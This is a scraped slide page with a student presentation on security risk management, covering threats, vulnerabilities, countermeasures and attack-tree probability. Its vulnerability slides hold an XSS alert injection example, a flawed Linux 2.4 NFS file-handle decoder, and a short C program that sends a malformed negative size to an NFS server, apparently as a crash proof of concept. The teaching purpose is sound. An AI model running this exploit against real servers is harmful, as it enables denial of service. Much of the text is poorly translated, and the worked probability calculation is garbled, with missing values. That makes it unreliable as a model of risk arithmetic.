Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami.

Slides:



Advertisements
Similar presentations
Driving Factors Security Risk Mgt Controls Compliance.
Advertisements

Chapter ADCS CS262/0898/V1 Chapter 1 An Introduction To Computer Security TOPICS Introduction Threats to Computer Systems –Threats, Vulnerabilities.
CS5038 The Electronic Society
Laptop Security in the current IT world W3 group.
Database Security Policies and Procedures and Implementation for the Disaster Management Communication System Presented By: Radostina Georgieva Master.
OSG Computer Security Plans Irwin Gaines and Don Petravick 17-May-2006.
Engineering Secure Software. Uses of Risk Thus Far  Start with the functionality Use cases  abuse/misuse cases p(exploit), p(vulnerability)  Start.
Is There a Security Problem in Computing? Network Security / G. Steffen1.
Mr C Johnston ICT Teacher
Chap 1: Overview Concepts of CIA: confidentiality, integrity, and availability Confidentiality: concealment of information –The need arises from sensitive.
1 Protection Protection = access control Goals of protection Protecting general objects Example: file protection in Linux.
Course ILT Security overview Unit objectives Discuss network security Discuss security threat trends and their ramifications Determine the factors involved.
1 Pertemuan 6 Points of Exposure Matakuliah:A0334/Pengendalian Lingkungan Online Tahun: 2005 Versi: 1/1.
Network and Server Attacks and Penetration Chapter 12.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Copyright © 2002 Pearson Education, Inc. Slide 5-1 PERTEMUAN 8.
Lecture 11 Reliability and Security in IT infrastructure.
Web server security Dr Jim Briggs WEBP security1.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Security Overview. 2 Objectives Understand network security Understand security threat trends and their ramifications Understand the goals of network.
Security Architecture Dr. Gabriel. Security Database security: –degree to which data is fully protected from tampering or unauthorized acts –Full understanding.
Application Threat Modeling Workshop
Alter – Information Systems 4th ed. © 2002 Prentice Hall 1 E-Business Security.
Security Risk Management Marcus Murray, CISSP, MVP (Security) Senior Security Advisor, Truesec
Information Security Technological Security Implementation and Privacy Protection.
SEC835 Database and Web application security Information Security Architecture.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
1 Deployment of Computer Security in an Organization CE-408 Sir Syed University of Engineering & Technology 99-CE-282, 257 & 260.
Discussing “Risk Analysis in Software Design” 1 FEB Joe Combs.
By Hafez Barghouthi. Agenda Today Attack. Security policy. Measuring Security. Standard. Assest. Vulnerability. Threat. Risk and Risk Mitigation.
What does “secure” mean? Protecting Valuables
Slide 1 Using Models Introduced in ISA-d Standard: Security of Industrial Automation and Control Systems (IACS) Rahul Bhojani ISA SP99 WG4 Meeting.
Security Architecture
Sample Security Model. Security Model Secure: Identity management & Authentication Filtering and Stateful Inspection Encryption and VPN’s Monitor: Intrusion.
Attacks On systems And Networks To understand how we can protect our system and network we need to know about what kind of attacks a hacker/cracker would.
Unit 6b System Security Procedures and Standards Component 8 Installation and Maintenance of Health IT Systems This material was developed by Duke University,
Lesson 7-Managing Risk. Overview Defining risk. Identifying the risk to an organization. Measuring risk.
John Carpenter & lecture & Information Security 2008 Lecture 1: Subject Introduction and Security Fundamentals.
Copyright © 2013 Pearson Education, Inc. Publishing as Prentice Hall
Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 1 Security Architecture.
Module 6: Designing Security for Network Hosts
Attack and Malicious Code Andrew Anaruk. Security Threats Denial of Service (DoS) Attacks Spoofing Social Engineering Attacks on Encrypted Data Software.
Topic 5: Basic Security.
IT Risks and Controls Revised on Content Internal Control  What is internal control?  Objectives of internal controls  Types of internal controls.
Introduction to Information Security
Lesson 19-E-Commerce Security Needs. Overview Understand e-commerce services. Understand the importance of availability. Implement client-side security.
IT Security. What is Information Security? Information security describes efforts to protect computer and non computer equipment, facilities, data, and.
McGraw-Hill/Irwin © 2013 The McGraw-Hill Companies, Inc., All Rights Reserved. Chapter 11 Computer Crime and Information Technology Security.
Chap1: Is there a Security Problem in Computing?.
Ingredients of Security
Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 1 Security Architecture.
CHAPTER 2 Laws of Security. Introduction Laws of security enable user make the judgment about the security of a system. Some of the “laws” are not really.
Computer Security By Duncan Hall.
Control and Security Frameworks Chapter Three Prepared by: Raval, Fichadia Raval Fichadia John Wiley & Sons, Inc
HIPAA Compliance Case Study: Establishing and Implementing a Program to Audit HIPAA Compliance Drew Hunt Network Security Analyst Valley Medical Center.
Intro to Network Security. Vocabulary Vulnerability Weakness that can be compromised Threat A method to exploit a vulnerability Attack Use of one or more.
Lect 8 Tahani al jehain. Types of attack Remote code execution: occurs when an attacker exploits a software and runs a program that the user does not.
1 © 2004, Cisco Systems, Inc. All rights reserved. Wireless LAN (network) security.
Mr C Johnston ICT Teacher BTEC IT Unit 09 - Lesson 11 Network Security.
Cyber Security – Client View Peter Gibbons | Head of Cyber Security, Group Business Services Suppliers’ Summer Conference 15/07/2015.
Risk Controls in IA Zachary Rensko COSC 481. Outline Definition Risk Control Strategies Risk Control Categories The Human Firewall Project OCTAVE.
By: Mark Reed.  Protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction.
Network Security SUBMITTED BY:- HARENDRA KUMAR IT-3 RD YR. 1.
Information Systems Security
Secure Software Confidentiality Integrity Data Security Authentication
Compliance with hardening standards
Chapter Three Objectives
Lesson Objectives Aims You should be able to:
To Join the Teleconference
Security in Networking
Presentation transcript:

Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami

Agenda The definition of Risk, and the sections Countermeasures in the event of Risk How to manage the Risk and probability

The definition of Risk and the sections The Risk is there is probably a threat and therefore can be exploited if used that threat might be called the Vulnerability Of this definition could be to separate the main sections of the Risk  Threat-: is the process of trying to access to confidential information of the Organization  Vulnerabilities: and that there are weaknesses in the organization can engage in which the attacker

Vulnerabilities Composed of two types and two  Technical Vulnerability :whether weak immunization and use of this vulnerability before the attacker knows the attack, the attack of technical  Administrative Vulnerability : Attack is the so-called non-technical or social engineering attack

Vulnerabilities And can be divided in terms of ease and difficulty of the two  High-level Vulnerability: an example is easy to use in writing software code to exploit that gap  Low-level Vulnerability: is the use of the most difficult and requires a lot of sources of financial sources or a long time the attacker

Example Vulnerability of XSS ( Cross Site Scripting ) HTML,JavaScript,VBscript,ActiveX,Flash ) Amend the URL address for a given site alert('Welcome') alert('Welcome')

Please login with the form below before proceeding: Login: Password:

Vulnerabilities unsigned linux-2.4, signed/unsigned static inline u32* decode_fh(u32 *p, struct svc_fh *fhp) { unsigned int size; fh_init(fhp, NFS3_FHSIZE); size = ntohl(*p++); if (size > NFS3_FHSIZE) return NULL; memcpy(&fhp->fh_handle.fh_base, p, size); fhp->fh_handle.fh_size = size; return p + XDR_QUADLEN(size); }

كود#include #include #define NFSPROG #define NFSVERS 3 #define NFSPROC_GETATTR 1 static struct diropargs heh; bool_t xdr_heh(XDR *xdrs, diropargs *heh) { int32_t werd = -1; return xdr_int32_t(xdrs, &werd); } int main(void) { CLIENT * client; struct timeval tv; client = clnt_create("marduk", NFSPROG, NFSVERS, "udp"); if(client == NULL) { perror("clnt_create\n"); } tv.tv_sec = 3; tv.tv_usec = 0; client->cl_auth = authunix_create_default(); clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh, (xdrproc_t) xdr_void, NULL, tv); return 0; }

Threat There are three essential components of a threat  Target  Agent  Event

Target Is the organization's information and the attacker can work on each of the following  Confidentiality: disclosure and that the confidential information to others  Integrity: possibility of changing the organization's information  Availability: and by denial of service via Dos  Accountability: It is not punished for it by the attacker to conceal the attack

Agents There must be three features  Access to the target: it may be a direct access to any account has to enter the system and may be indirectly through an intermediary  Knowledge about the target  Motivation

Events Is in many ways be the most important and ill-authorized access, and others authorized to information or the system either through the development of malicious codes (viruses or Trojan) of the Regulations

Countermeasures in the event of Risk There is no doubt that the information varies from facility to facility and information according to the institution by institution, the importance of information to take appropriate action may be to intervene before a danger, and called the Proactive Model and intervention may be after the occurrence of danger and called the Reactive Model

Countermeasures in the event of Risk There are some examples of countermeasures to the threat or attack  Firewalls  Anti-virus software  Access Control  Two-factor authentication systems  Well-trained employees

How to manage the Risk and probability Steps involved in risk management  Risk Analysis  Decision Management  Implementation

How to manage the Risk and probability Risk management, where intervention is divided into two sections:  Reactive Model : It is a very famous type is the so-called emotional intervention For example, a security official in the company to download anti-virus program after the virus is spreading and destroying some devices can be calculated as follows Protection cost = total cost of the risk + the cost of countermeasures

How to manage the Risk and probability  Proactive Model :Prior to the Risk of this type is much better in terms of cost Protection cost = cost of the minimum risk + the cost of countermeasures

How to manage the Risk and probability Account the possibility of a threat:  the beginning of the top of any tree to be in the form of  The search for the roads leading to the occurrence of or potential threat  The collection of these methods to use (or,And(  to calculate the potential, we start from the top down

How to manage the Risk and probability

Example When the attacker tries to break the password Root Either that the attacker tries to find the root of the word by guessing Guessing the root password Or attack the network as a whole to try and there Bugs in the network And at this point is to achieve two of Bugs 1-there are gaps that can be exploited (And, or) must verify the condition II with 2- that does not happen the system (b Trigram any potential path for this gap

How to manage the Risk and probability

P(guessing root password = A) = 5/1000 = P(exploiting (( active server = B) = 50 /1000 = 0.05 (AND) P (system is not updated or not configured properly =C) = 0.1

How to manage the Risk and probability Assumptions made in the guess a password equal to the exploitation of the gap and b, the latter if there is no system c P(attack service =BC) = P(B)*P(C) = 0.05 * 0.1 = ( AND) P(break-in = (total)(P(A)+P(BC)-P(A)P(BC) = – *0.005 = ( OR) (Total Probability ) break0in

Reference Prentice.Hall.Cryptography.and.Network.Security.4t h.Edition.Nov.2005